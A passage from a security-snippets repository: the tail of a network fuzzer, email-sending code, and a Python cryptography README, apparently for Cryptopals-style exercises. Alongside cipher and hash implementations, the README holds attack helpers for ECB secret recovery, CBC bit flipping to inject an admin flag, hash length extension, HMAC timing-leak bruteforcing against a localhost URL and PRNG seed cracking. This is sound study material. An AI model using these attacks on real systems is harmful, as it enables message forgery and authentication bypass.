'blablablabal'.format(now=datetime.datetime.now().strftime('%Y%m%d%H%M%S')).encode() 224 | with open('fuzzing_{}.txt'.format(datetime.datetime.now().strftime('%Y%m%d%H%M%S')), 'w') as f: 225 | for case in all_cases(payload): 226 | # print(bytes(case)) 227 | send_payload(host, port, f, msg_len_adjustment(case)) 228 | 229 | 230 | ``` 231 | 232 | ### Fake SMTP server 233 | 234 | ```python 235 | sudo python -m smtpd -n -c DebuggingServer localhost:25 236 | ``` 237 | 238 | ### Send email 239 | 240 | ```python 241 | from email.mime.multipart import MIMEMultipart 242 | from email.mime.text import MIMEText 243 | from email.mime.base import MIMEBase 244 | from email import encoders 245 | import smtplib 246 | 247 | 248 | def create_plain_content(content): 249 | return MIMEText(content, 'plain') 250 | 251 | def create_html_content(content): 252 | return MIMEText(content, 'html') 253 | 254 | def create_attachment(filename): 255 | attachment = MIMEBase('application', "octet-stream") 256 | attachment.set_payload(open(filename, "rb").read()) 257 | encoders.encode_base64(attachment) 258 | 259 | attachment.add_header('Content-Disposition', 'attachment', filename=filename) 260 | return attachment 261 | 262 | def send_mail(server, from_addr, to_addr_list, subject, content, attachment=None): 263 | msg = MIMEMultipart('alternative') 264 | msg['Subject'] = subject 265 | msg['From'] = from_addr 266 | msg['To'] = ', '.join(to_addr_list) 267 | 268 | msg.attach(content) 269 | 270 | if attachment: msg.attach(attachment) 271 | 272 | s = smtplib.SMTP(server) 273 | s.set_debuglevel(1) 274 | 275 | try: 276 | # s.starttls() 277 | pass 278 | s.send_message(msg) 279 | finally: 280 | s.quit() 281 | ``` -------------------------------------------------------------------------------- /snippets/python_crypto/README.MD: -------------------------------------------------------------------------------- 1 | ## Python Crypto stuff 2 | 3 | ```python 4 | import binascii 5 | import itertools 6 | import hashlib 7 | from math import ceil 8 | from os import urandom 9 | import random 10 | import string 11 | import struct 12 | import time 13 | import urllib.request 14 | import zlip 15 | 16 | from Crypto import Random 17 | from Crypto.Cipher import AES 18 | from Crypto.Util import Counter 19 | from Crypto.Util.number import getPrime as primegen 20 | 21 | def raw_to_b64(raw): 22 | return binascii.b2a_base64(raw).rstrip() 23 | 24 | def b64_to_raw(b64_string): 25 | return binascii.a2b_base64(b64_string) 26 | 27 | def raw_to_hex(raw): 28 | return binascii.hexlify(bytes(raw)).decode('utf-8') 29 | # return ''.join(['{:02x}'.format(b) for b in raw]) 30 | 31 | def raw_to_bin(raw): 32 | return ''.join(['{:b}'.format(b) for b in raw]) 33 | 34 | def raw_to_ascii(raw): 35 | return ''.join([chr(b) for b in raw]) 36 | 37 | def hex_to_raw(hex_string): 38 | return binascii.unhexlify(hex_string) 39 | 40 | def hex_to_decimal(hex_string): 41 | return int(hex_string, 16) 42 | 43 | def int_to_raw(integer): 44 | # return struct.pack(">I", big_int) # left for reference 45 | return integer.to_bytes(integer.bit_length()//8+1, byteorder='big') 46 | 47 | def raw_to_int(raw): 48 | return int.from_bytes(raw, byteorder='big') 49 | 50 | def ascii_to_raw(ascii_string): 51 | # If ascii_string is aa list it will be joined until it is no longer, e.g. 52 | # a list of lists of strings will correctly be converted into a string USEFUL IN CHALLENGE 6 53 | while isinstance(ascii_string, list): 54 | ascii_string = ''.join([element for element in ascii_string]) 55 | if isinstance(ascii_string, bytes): 56 | return ascii_string 57 | return bytes(ascii_string, 'utf-8') 58 | 59 | def list_of_int_to_bytes(list_of_ints): 60 | return bytes(list_of_ints) # more of a reminder than an actual useful method 61 | 62 | def parse_unicode_str(str_w_unicode_chars): 63 | # e.g. "Rollin' in my 5.\x8c\xf6\xe1\xb6uT\x8e_bby" 64 | import codecs 65 | return codecs.escape_decode(str_w_unicode_chars)[0] 66 | 67 | def saml_decode_base64_and_inflate(value): 68 | return zlib.decompress(b64_to_raw(unquote(value)), -15).decode('utf-8') 69 | 70 | def saml_deflate_and_base64_encode(value): 71 | return raw_to_b64(zlib.compress(unquote(value).encode('utf-8'))[2:-4]) 72 | 73 | #################################### 74 | # Common methods # 75 | #################################### 76 | 77 | def xor(msg, key): 78 | msg, key = list(msg), list(key) 79 | if len(msg) != len(key): 80 | raise ValueError("Msg and key lenghts do not match. msg {}, key {}".format(len(msg),len(key))) 81 | return bytes([msg[i] ^ key[i] for i in range(len(msg))]) 82 | 83 | def repeating_char_xor(msg, key_char): 84 | return xor(msg, [key_char for _ in range(len(msg))]) 85 | 86 | def repeating_key_xor(msg, key): 87 | key = (ceil(len(msg)/len(key))*key)[:len(msg)] 88 | return xor(msg, key) 89 | 90 | def score_plaintext(plaintext, strict=False): 91 | ETAOIN = 'ETAOINSHRDLCUMWFGYPBVKJXQZ 1234567890!"\'#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n\r' 92 | counter = 0 93 | for letter in plaintext: 94 | if letter.upper() in ETAOIN: 95 | counter += len(ETAOIN) - ETAOIN.index(letter.upper()) 96 | else: 97 | counter -= len(ETAOIN) # to punish plain texts with non printable chars 98 | return counter/len(plaintext) 99 | 100 | def single_char_xor_bruteforce(ciphertext): 101 | l = {key:score_plaintext(raw_to_ascii(repeating_char_xor(ciphertext, key))) for key in range(256)} 102 | return sorted(l.items(), key=lambda x: x[1], reverse=True)[0][0] 103 | 104 | def hamming_dist(raw1, raw2): 105 | return sum([bin(l).count('1') for l in xor(raw1, raw2)]) 106 | 107 | def break_raw_into_chunks(raw, chunksize): 108 | return [raw[i:i+chunksize] for i in range(0,len(raw),chunksize)] 109 | 110 | def transpose_blocks(blocks): 111 | # Gets the nth element of every block and creates a new block with them, e/g/ 112 | # transpose_blocks([[1,2,3],[1,2,3],[1,2,3]]) == [[1,1,1],[2,2,2],[3,3,3]] 113 | return [block for block in itertools.zip_longest(*blocks, fillvalue=0)] 114 | 115 | def targeted_bit_flipping(cpt, original_str, target_str, offset=0): 116 | # generator which bit flips a ciphertext attempting to go from 117 | # original string to target string e.g. 'AAAAAAAAAAA' to ';admin=True' 118 | # i is starting offset within cpt which will be flipped 119 | # j is the len of the original_str, so flip will happen from cpt[i] until cpt[i+len(original_str)] 120 | assert(len(original_str) == len(target_str)) 121 | for i in range(offset, len(cpt)-len(original_str)): 122 | flipped_cpt = list(cpt) 123 | for j in range(len(original_str)): 124 | flipped_cpt[i+j] = cpt[i+j] ^ ord(original_str[j]) ^ ord(target_str[j]) 125 | yield bytes(flipped_cpt) 126 | 127 | ##################################### 128 | # Cipher type/mode detection ahead # 129 | ##################################### 130 | 131 | def discover_block_size(oracle): 132 | initial_len = len(oracle('')) 133 | for i in range(100): 134 | new_len = len(oracle('A'*i)) 135 | if new_len - initial_len > 0: 136 | return new_len - initial_len 137 | 138 | def detect_aes_block_cipher_mode(oracle, block_size): 139 | blocks = break_raw_into_chunks(oracle('A'*block_size*3), block_size) 140 | return 'ECB' if sum([1 for b1, b2 in list(itertools.combinations(blocks,2)) if b1==b2]) > 0 else 'CBC' 141 | 142 | def detect_cipher_type(oracle): 143 | cpt1 = oracle('A' * 1) 144 | size = 2 145 | for _ in range(65): # run maximum of 65 times 146 | cpt2 = oracle('A' * size) 147 | if len(cpt2) - len(cpt1) == 1: 148 | return 'stream' 149 | elif len(cpt2) > len(cpt1): 150 | return 'block' 151 | cpt1 = cpt2 152 | size +=1 153 | return 'hash?' 154 | 155 | class RandomCipher(object): 156 | def __init__(self): 157 | self.key = Random.new().read(16) 158 | self.before_bytes = Random.new().read(random.randint(0,20)) 159 | self.after_bytes = Random.new().read(random.randint(0,20)) 160 | self.oracle, self.cipher_type = random.choice([ 161 | (aes_ecb_encrypt, 'block'), 162 | (aes_cbc_encrypt, 'block'), 163 | (prng_stream_encrypt, 'stream'), 164 | (aes_ctr_randomiv_encrypt, 'stream'), 165 | ]) 166 | def encrypt(self, msg): 167 | msg = self.before_bytes + ascii_to_raw(msg) + self.after_bytes 168 | return self.oracle(self.key, msg) 169 | 170 | #################################### 171 | # Block Ciphers ahead # 172 | #################################### 173 | 174 | def pad_with_pkcs7(msg, block_size=16): 175 | msg = ascii_to_raw(msg) 176 | padding = block_size - (len(msg) % block_size) 177 | msg = msg + bytes(chr(padding) * padding, 'ascii') 178 | return msg 179 | 180 | def unpad_with_pkcs7(padded_plaintext): 181 | padded_plaintext = ascii_to_raw(padded_plaintext) 182 | last_byte = padded_plaintext[-1] 183 | pad = padded_plaintext[-last_byte:] 184 | if len(pad) != last_byte or [c for c in pad if c != last_byte]: 185 | raise ValueError("Bad padding. Last_byte = {}".format(hex(last_byte))) 186 | 187 | return padded_plaintext[:-last_byte] 188 | 189 | def aes_ecb_encrypt(key, msg): 190 | block_size = len(key) 191 | msg = pad_with_pkcs7(msg) 192 | cipher = AES.new(key, AES.MODE_ECB) 193 | return cipher.encrypt(msg) 194 | 195 | def aes_ecb_decrypt(key, cpt): 196 | block_size = len(key) 197 | cipher = AES.new(key, AES.MODE_ECB) 198 | msg = cipher.decrypt(cpt) 199 | return unpad_with_pkcs7(msg) 200 | 201 | def aes_cbc_encrypt(key, msg, iv=''): 202 | block_size = len(key) 203 | msg = pad_with_pkcs7(msg) 204 | iv = iv or Random.new().read(block_size) 205 | cipher = AES.new(key, AES.MODE_CBC, iv) 206 | return iv + cipher.encrypt(msg) 207 | 208 | def aes_cbc_decrypt(key, cpt, iv=''): 209 | block_size = len(key) 210 | if not iv: # if iv is not given, consider it the first block of cpt 211 | iv, cpt = cpt[:block_size], cpt[block_size:] 212 | cipher = AES.new(key, AES.MODE_CBC, iv) 213 | msg = cipher.decrypt(cpt) 214 | return unpad_with_pkcs7(msg) 215 | 216 | def aes_ecb_find_secret_appended_text(oracle, block_size): 217 | # finds max size of prepended text, give or take padding 218 | cpt = break_raw_into_chunks(oracle('A' * block_size * 20), block_size) 219 | for i, chunk in enumerate(cpt): 220 | if chunk == cpt[i+1]: # If True, prepended finishes between i-1 and i 221 | max_size_of_prepended_text = i*block_size 222 | break 223 | 224 | # brute forces the appended text one character at a time 225 | for i in range(0, block_size): 226 | padding = 'A'*i 227 | my_input = 'A' * (block_size * 11) 228 | secret_append = '' 229 | 230 | try: 231 | while my_input: 232 | my_input = my_input[:-1] 233 | d = {oracle(padding + my_input + secret_append + l)[max_size_of_prepended_text+160:max_size_of_prepended_text+176]:l for l in string.printable} 234 | secret_append += d[oracle(padding + my_input)[max_size_of_prepended_text+160:max_size_of_prepended_text+176]] 235 | except KeyError: 236 | if secret_append: 237 | return ascii_to_raw(secret_append) 238 | 239 | #################################### 240 | # Stream Ciphers ahead # 241 | #################################### 242 | 243 | def aes_ctr_encrypt(key, msg, counter): 244 | cipher = AES.new(key, AES.MODE_CTR, counter=counter) 245 | return cipher.decrypt(msg) 246 | 247 | def aes_ctr_randomiv_encrypt(key, msg): 248 | counter = Counter.new(8*16, initial_value = int.from_bytes(Random.new().read(16), 'big')) 249 | iv = counter.next_value().to_bytes(16, byteorder='big') 250 | # iv = bytes.fromhex(hex(counter.next_value())[2:]) # old, shitty way 251 | cipher = AES.new(key, AES.MODE_CTR, counter=counter) 252 | return iv + cipher.decrypt(msg) 253 | 254 | def aes_ctr_randomiv_decrypt(key, cpt): 255 | counter = Counter.new(8*16, initial_value = int.from_bytes(cpt[:16],'big')) 256 | cipher = AES.new(key, AES.MODE_CTR, counter=counter) 257 | return cipher.decrypt(cpt[16:]) 258 | 259 | def prng_stream_encrypt(seed, msg): 260 | seed = int.from_bytes(seed, byteorder='big') 261 | gen = prng(seed) 262 | # 0xFF mask to only get 8 bits from each rng iteration 263 | keystream = bytes([next(gen)&0xFF for _ in range(len(msg))]) 264 | return xor(keystream, msg) 265 | 266 | #################################### 267 | # PRNG ahead # 268 | #################################### 269 | 270 | def prng(seed, initial_element=0): 271 | """ MT19937 Mersenne Twister RNG. Is a python generator. Usage: 272 | gen = rng() 273 | random_value = next(gen) 274 | next_random_value = next(gen) """ 275 | (w, n, m, r) = (32, 624, 397, 31) 276 | a = 0x9908B0DF 277 | (u, d) = (11, 0xFFFFFFFF) 278 | (s, b) = (7, 0x9D2C5680) 279 | (t, c) = (15, 0xEFC60000) 280 | l = 18 281 | f = 1812433253 282 | lower_mask = (1 << r) - 1 283 | upper_mask = 0xFFFFFFFF & ~lower_mask 284 | 285 | index = n 286 | MT = [0] * n 287 | MT[0] = seed 288 | 289 | # Initialize the generator from a seed 290 | for i in range(1,n): 291 | MT[i] = (f * (MT[i-1] ^ (MT[i-1] >> (w-2))) + i) & 0xFFFFFFFF # 32 bits mask 292 | 293 | j = 0 294 | 295 | while True: 296 | if index >= n: 297 | # twist - generate the next n values from the series x_i 298 | for i in range(n): 299 | x = (MT[i] & upper_mask) + (MT[(i+1) % n] & lower_mask) 300 | xA = x >> 1 301 | if (x % 2) != 0: 302 | xA = xA ^ a 303 | MT[i] = MT[(i + m) % n] ^ xA 304 | index = 0 305 | y = MT[index] 306 | y = y ^ ((y >> u) & d) 307 | y = y ^ ((y << s) & b) 308 | y = y ^ ((y << t) & c) 309 | y = y ^ (y >> l) 310 | index += 1 311 | if j != initial_element: # this runs initial_element before yielding 312 | j+=1 313 | else: 314 | yield 0xFFFFFFFF & y # returns the first 32 bits of y 315 | 316 | def bruteforce_prng_seed(prng, random_values, start=0, stop=0xFFFF, 317 | initial_prng_element=0, bit_mask=0xFFFFFFFF): 318 | 319 | random_values = random_values if isinstance(random_values, list) else [random_values] # in case random_values is a single element 320 | key_attempt = start 321 | 322 | while key_attempt <= stop: 323 | gen = prng(key_attempt, initial_element=initial_prng_element) 324 | mismatch = False 325 | 326 | for val in random_values: 327 | if val != (next(gen) & bit_mask): 328 | mismatch = True 329 | key_attempt += 1 330 | break 331 | if not mismatch: 332 | return key_attempt 333 | return None 334 | 335 | #################################### 336 | # Hashing/MAC ahead # 337 | #################################### 338 | 339 | def _left_rotate(n, b): 340 | # Left rotate a 32-bit integer n by b bits 341 | return ((n << b) | ((n & 0xffffffff) >> (32 - b))) & 0xffffffff 342 | 343 | def _right_rotate(n, b): 344 | # Right rotate a 32-bit integer n by n bits 345 | return ((n >> b) | (n << (32 - b))) & 0xffffffff 346 | 347 | def md_padding(msg_length, endianess='big'): 348 | # Merkle–Damgård padding 349 | return b''.join([ 350 | # append the bit '1' to the message 351 | b'\x80', 352 | # append 0 <= k < 512 bits '0', so that the resulting message length (in bytes) 353 | # is congruent to 56 (mod 64) 354 | b'\x00' * ((56 - (msg_length + 1) % 64) % 64), 355 | # append length of message (before pre-processing), in bits, as 64-bit big-endian integer 356 | (msg_length * 8).to_bytes(8, byteorder=endianess) 357 | ]) 358 | 359 | def sha1(msg, state=(0x67452301,0xEFCDAB89,0x98BADCFE,0x10325476,0xC3D2E1F0), fake_len=0, raw=False): 360 | # source https://github.com/ajalt/python-sha1/blob/master/sha1.py 361 | 362 | def _process_chunk(chunk, h0, h1, h2, h3, h4): 363 | # Process a chunk of data and return the new digest variables. 364 | assert len(chunk) == 64 365 | 366 | w = [0] * 80 367 | 368 | w[:16] = struct.unpack('!16L', chunk) 369 | 370 | # Extend the sixteen 4-byte words into eighty 4-byte words 371 | for i in range(16, 80): 372 | w[i] = _left_rotate(w[i-3] ^ w[i-8] ^ w[i-14] ^ w[i-16], 1) 373 | 374 | # Initialize hash value for this chunk 375 | a, b, c, d, e = h0, h1, h2, h3, h4 376 | 377 | for i in range(80): 378 | if 0 <= i <= 19: 379 | # Use alternative 1 for f from FIPS PB 180-1 to avoid bitwise not 380 | f = d ^ (b & (c ^ d)) 381 | k = 0x5A827999 382 | elif 20 <= i <= 39: 383 | f = b ^ c ^ d 384 | k = 0x6ED9EBA1 385 | elif 40 <= i <= 59: 386 | f = (b & c) | (b & d) | (c & d) 387 | k = 0x8F1BBCDC 388 | elif 60 <= i <= 79: 389 | f = b ^ c ^ d 390 | k = 0xCA62C1D6 391 | 392 | a, b, c, d, e = ((_left_rotate(a, 5) + f + e + k + w[i]) & 0xffffffff, 393 | a, _left_rotate(b, 30), c, d) 394 | 395 | # Add this chunk's hash to result so far 396 | h0 = (h0 + a) & 0xffffffff 397 | h1 = (h1 + b) & 0xffffffff 398 | h2 = (h2 + c) & 0xffffffff 399 | h3 = (h3 + d) & 0xffffffff 400 | h4 = (h4 + e) & 0xffffffff 401 | 402 | return h0, h1, h2, h3, h4 403 | 404 | msg = ascii_to_raw(msg) 405 | msg += md_padding(fake_len or len(msg)) 406 | 407 | for chunk in break_raw_into_chunks(msg, 64): 408 | state = _process_chunk(chunk, *state) 409 | 410 | output = struct.pack('>5I', *state) 411 | return output if raw else raw_to_hex(output) 412 | 413 | def sha256(msg, state=(0x6a09e667,0xbb67ae85,0x3c6ef372,0xa54ff53a,0x510e527f,0x9b05688c,0x1f83d9ab,0x5be0cd19), fake_len=0, raw=False): 414 | 415 | _k = [ 416 | 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5, 417 | 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174, 418 | 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da, 419 | 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967, 420 | 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85, 421 | 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070, 422 | 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3, 423 | 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2 424 | ] 425 | 426 | def _process_chunk(chunk, h0, h1, h2, h3, h4, h5, h6, h7): 427 | w = [0]*64 428 | 429 | w[:16] = struct.unpack('>16L', chunk) 430 | 431 | for i in range(16, 64): 432 | s0 = _right_rotate(w[i-15], 7) ^ _right_rotate(w[i-15], 18) ^ (w[i-15] >> 3) 433 | s1 = _right_rotate(w[i-2], 17) ^ _right_rotate(w[i-2], 19) ^ (w[i-2] >> 10) 434 | w[i] = (w[i-16] + s0 + w[i-7] + s1) & 0xffffffff 435 | 436 | a,b,c,d,e,f,g,h = h0,h1,h2,h3,h4,h5,h6,h7 437 | 438 | for i in range(64): 439 | s0 = _right_rotate(a, 2) ^ _right_rotate(a, 13) ^ _right_rotate(a, 22) 440 | maj = (a & b) ^ (a & c) ^ (b & c) 441 | t2 = s0 + maj 442 | s1 = _right_rotate(e, 6) ^ _right_rotate(e, 11) ^ _right_rotate(e, 25) 443 | ch = (e & f) ^ ((~e) & g) 444 | t1 = h + s1 + ch + _k[i] + w[i] 445 | 446 | h = g 447 | g = f 448 | f = e 449 | e = (d + t1) & 0xffffffff 450 | d = c 451 | c = b 452 | b = a 453 | a = (t1 + t2) & 0xffffffff 454 | 455 | h0 = (h0 + a) & 0xffffffff 456 | h1 = (h1 + b) & 0xffffffff 457 | h2 = (h2 + c) & 0xffffffff 458 | h3 = (h3 + d) & 0xffffffff 459 | h4 = (h4 + e) & 0xffffffff 460 | h5 = (h5 + f) & 0xffffffff 461 | h6 = (h6 + g) & 0xffffffff 462 | h7 = (h7 + h) & 0xffffffff 463 | return h0, h1, h2, h3, h4, h5, h6, h7 464 | 465 | msg = ascii_to_raw(msg) 466 | msg += md_padding(fake_len or len(msg)) 467 | 468 | for chunk in break_raw_into_chunks(msg, 64): 469 | state = _process_chunk(chunk, *state) 470 | 471 | output = struct.pack('>8I', *state) 472 | return output if raw else raw_to_hex(output) 473 | 474 | def sha224(msg, state=(0xc1059ed8, 0x367cd507, 0x3070dd17, 0xf70e5939, 0xffc00b31, 0x68581511, 0x64f98fa7, 0xbefa4fa4), fake_len=0, raw=False): 475 | # Reuses sha256 implementation 476 | state_from_sha256 = struct.unpack('>8I', sha256(msg, state, fake_len, raw=True)) 477 | output = struct.pack('>7I', *state_from_sha256[:-1]) 478 | return output if raw else raw_to_hex(output) 479 | 480 | def md4(msg, state=(0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476), fake_len=0, raw=False): 481 | # source http://www.acooke.org/cute/PurePython0.html 482 | def f(x, y, z): return x & y | ~x & z 483 | def g(x, y, z): return x & y | x & z | y & z 484 | def h(x, y, z): return x ^ y ^ z 485 | def f1(a, b, c, d, k, s, X): return _left_rotate(a + f(b, c, d) + X[k], s) 486 | def f2(a, b, c, d, k, s, X): return _left_rotate(a + g(b, c, d) + X[k] + 0x5a827999, s) 487 | def f3(a, b, c, d, k, s, X): return _left_rotate(a + h(b, c, d) + X[k] + 0x6ed9eba1, s) 488 | 489 | def _process_chunk(x, h0, h1, h2, h3): 490 | a, b, c, d = h0, h1, h2, h3 491 | 492 | x = struct.unpack('<16L', x) 493 | 494 | a = f1(a,b,c,d, 0, 3, x) 495 | d = f1(d,a,b,c, 1, 7, x) 496 | c = f1(c,d,a,b, 2,11, x) 497 | b = f1(b,c,d,a, 3,19, x) 498 | a = f1(a,b,c,d, 4, 3, x) 499 | d = f1(d,a,b,c, 5, 7, x) 500 | c = f1(c,d,a,b, 6,11, x) 501 | b = f1(b,c,d,a, 7,19, x) 502 | a = f1(a,b,c,d, 8, 3, x) 503 | d = f1(d,a,b,c, 9, 7, x) 504 | c = f1(c,d,a,b,10,11, x) 505 | b = f1(b,c,d,a,11,19, x) 506 | a = f1(a,b,c,d,12, 3, x) 507 | d = f1(d,a,b,c,13, 7, x) 508 | c = f1(c,d,a,b,14,11, x) 509 | b = f1(b,c,d,a,15,19, x) 510 | 511 | a = f2(a,b,c,d, 0, 3, x) 512 | d = f2(d,a,b,c, 4, 5, x) 513 | c = f2(c,d,a,b, 8, 9, x) 514 | b = f2(b,c,d,a,12,13, x) 515 | a = f2(a,b,c,d, 1, 3, x) 516 | d = f2(d,a,b,c, 5, 5, x) 517 | c = f2(c,d,a,b, 9, 9, x) 518 | b = f2(b,c,d,a,13,13, x) 519 | a = f2(a,b,c,d, 2, 3, x) 520 | d = f2(d,a,b,c, 6, 5, x) 521 | c = f2(c,d,a,b,10, 9, x) 522 | b = f2(b,c,d,a,14,13, x) 523 | a = f2(a,b,c,d, 3, 3, x) 524 | d = f2(d,a,b,c, 7, 5, x) 525 | c = f2(c,d,a,b,11, 9, x) 526 | b = f2(b,c,d,a,15,13, x) 527 | 528 | a = f3(a,b,c,d, 0, 3, x) 529 | d = f3(d,a,b,c, 8, 9, x) 530 | c = f3(c,d,a,b, 4,11, x) 531 | b = f3(b,c,d,a,12,15, x) 532 | a = f3(a,b,c,d, 2, 3, x) 533 | d = f3(d,a,b,c,10, 9, x) 534 | c = f3(c,d,a,b, 6,11, x) 535 | b = f3(b,c,d,a,14,15, x) 536 | a = f3(a,b,c,d, 1, 3, x) 537 | d = f3(d,a,b,c, 9, 9, x) 538 | c = f3(c,d,a,b, 5,11, x) 539 | b = f3(b,c,d,a,13,15, x) 540 | a = f3(a,b,c,d, 3, 3, x) 541 | d = f3(d,a,b,c,11, 9, x) 542 | c = f3(c,d,a,b, 7,11, x) 543 | b = f3(b,c,d,a,15,15, x) 544 | 545 | return [(h0 + a) & 0xffffffff, (h1 + b) & 0xffffffff, (h2 + c) & 0xffffffff, (h3 + d) & 0xffffffff] 546 | 547 | msg = ascii_to_raw(msg) 548 | msg += md_padding(fake_len or len(msg), 'little') 549 | 550 | for chunk in break_raw_into_chunks(msg, 64): 551 | state = _process_chunk(chunk, *state) 552 | 553 | output = struct.pack('<4I', *state) 554 | return output if raw else raw_to_hex(output) 555 | 556 | def length_extension(hash_function, original_tag, original_msg, append_msg, endianness=('big','little'), max_key_len=64): 557 | if isinstance(endianness, str): 558 | endianness = [endianness] 559 | 560 | msg_tag_pairs = [] 561 | 562 | for e in endianness: 563 | h = [int.from_bytes(i, byteorder=e) for i in break_raw_into_chunks(hex_to_raw(original_tag), 4)] 564 | 565 | for key_length in range(max_key_len): 566 | msg = original_msg + md_padding(len(b'a'*key_length + original_msg), e) + append_msg 567 | tag = hash_function(append_msg, h, len(msg) + key_length) 568 | msg_tag_pairs.append((msg, tag)) 569 | 570 | return msg_tag_pairs 571 | 572 | def hmac(key, msg, hash_function=sha1, raw=False): 573 | if (len(key) > 64): 574 | key = hash_function(key, raw=True) 575 | if (len(key) < 64): 576 | key = key + b'\x00' * (64 - len(key)) 577 | 578 | o_key_pad = xor(b'\x5c' * 64, key) 579 | i_key_pad = xor(b'\x36' * 64, key) 580 | 581 | output = hash_function(o_key_pad + hash_function(i_key_pad + msg, raw=True), raw=True) 582 | return output if raw else raw_to_hex(output) 583 | 584 | def hmac_timing_leak_bruteforce(msg, hash_function=sha1, url='http://localhost:5000?msg={}&tag={}'): 585 | 586 | hashlen = len(hash_function(b'test',raw=True)) 587 | payload = [0] * hashlen 588 | 589 | for i in range(len(payload)): 590 | 591 | counter = {} 592 | 593 | while True: 594 | slowest_delay = 0 595 | slowest_val = 0 596 | 597 | for j in range(256): 598 | payload[i] = j 599 | this_tag_attempt = raw_to_hex(payload) 600 | 601 | start_time = time.perf_counter() 602 | try: 603 | urllib.request.urlopen(url.format(msg, this_tag_attempt)) 604 | except urllib.error.HTTPError as e: 605 | pass 606 | runtime = time.perf_counter() - start_time 607 | 608 | if runtime > slowest_delay: 609 | slowest_delay = runtime 610 | slowest_val = j 611 | 612 | counter[slowest_val] = counter.setdefault(slowest_val, 0) + 1 613 | if counter[slowest_val] == 3: 614 | payload[i] = slowest_val 615 | print('Found next byte - {}'.format(raw_to_hex(payload[:i+1]))) 616 | break 617 | 618 | tag = raw_to_hex(payload) 619 | assert(urllib.request.urlopen(url.format(msg, tag)).getcode() == 200) 620 | return tag 621 | 622 | def supported_hashes(): 623 | return [md4, sha1, sha256, sha224] 624 | 625 | def guess_hash_type(thishash): 626 | # Guesses likely hashing algorithm based on hash length 627 | if not isinstance(thishash, bytes): 628 | thishash = hex_to_raw(thishash) 629 | 630 | if len(thishash) == 16: 631 | return md4 632 | elif len(thishash) == 20: 633 | return sha1 634 | elif len(thishash) == 28: 635 | return sha224 636 | elif len(thishash) == 32: 637 | return sha256 638 | 639 | #################################### 640 | # Math # 641 | #################################### 642 | 643 | def modexp(base, exponent, modulus): 644 | if modulus == 1: 645 | return 0 646 | result = 1 647 | base = base % modulus 648 | while exponent > 0: 649 | if (exponent % 2 == 1): 650 | result = (result * base) % modulus 651 | exponent = exponent >> 1 652 | base = (base * base) % modulus 653 | return result 654 | 655 | def egcd(b, n): 656 | # wtf? 657 | x0, x1, y0, y1 = 1, 0, 0, 1 658 | while n != 0: 659 | q, b, n = b // n, n, b % n 660 | x0, x1 = x1, x0 - q * x1 661 | y0, y1 = y1, y0 - q * y1 662 | return b, x0, y0 663 | 664 | def modinv(a, m): 665 | g, x, y = egcd(a, m) 666 | if g != 1: 667 | raise Exception('modular inverse does not exist') 668 | else: 669 | return x % m 670 | 671 | def find_cube_root(n): 672 | lo = 0 673 | hi = n 674 | while lo < hi: 675 | mid = (lo+hi)//2 676 | if mid**3 < n: 677 | lo = mid+1 678 | else: 679 | hi = mid 680 | return lo 681 | 682 | #################################### 683 | # Public key crypto # 684 | #################################### 685 | 686 | class DH(): 687 | # Diffie Hellman 688 | # Refer to https://datatracker.ietf.org/doc/rfc3526/?include_text=1 for constants 689 | default_p = 2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919 # raw_to_int(hex_to_raw('ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca237327ffffffffffffffff')) 690 | default_g = 2 691 | 692 | def __init__(self, p=default_p, g=default_g, peer_public_key=None): 693 | self.p = p 694 | self.g = g 695 | self.private_key = raw_to_int(urandom(128)) % p 696 | self.public_key = modexp(g, self.private_key, p) 697 | if peer_public_key: 698 | self.key_exchange(peer_public_key) 699 | 700 | def key_exchange(self, peer_public_key): 701 | self.shared_secret = int_to_raw(modexp(peer_public_key, self.private_key, self.p)) 702 | self.shared_key = sha1(self.shared_secret, raw=True)[:16] 703 | 704 | class SRPServer(): 705 | # Secure Remote Password (SRP) Server implementation 706 | 707 | def __init__(self, g=2, k=3, N=2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919 ): 708 | self.N = N 709 | self.g = g 710 | self.k = k 711 | self.users = {} 712 | self.create_user('luis@teix.co', 'password') 713 | self.create_user('test@gmail.com', 'secret') 714 | 715 | def create_user(self, email, password): 716 | password = ascii_to_raw(password) 717 | salt = urandom(4) 718 | x = raw_to_int(sha256(salt + password, raw=True)) 719 | v = modexp(self.g, x, self.N) 720 | self.users[email] = {'salt': salt, 'v': v} 721 | 722 | def key_exchange(self, email, client_public_key): 723 | 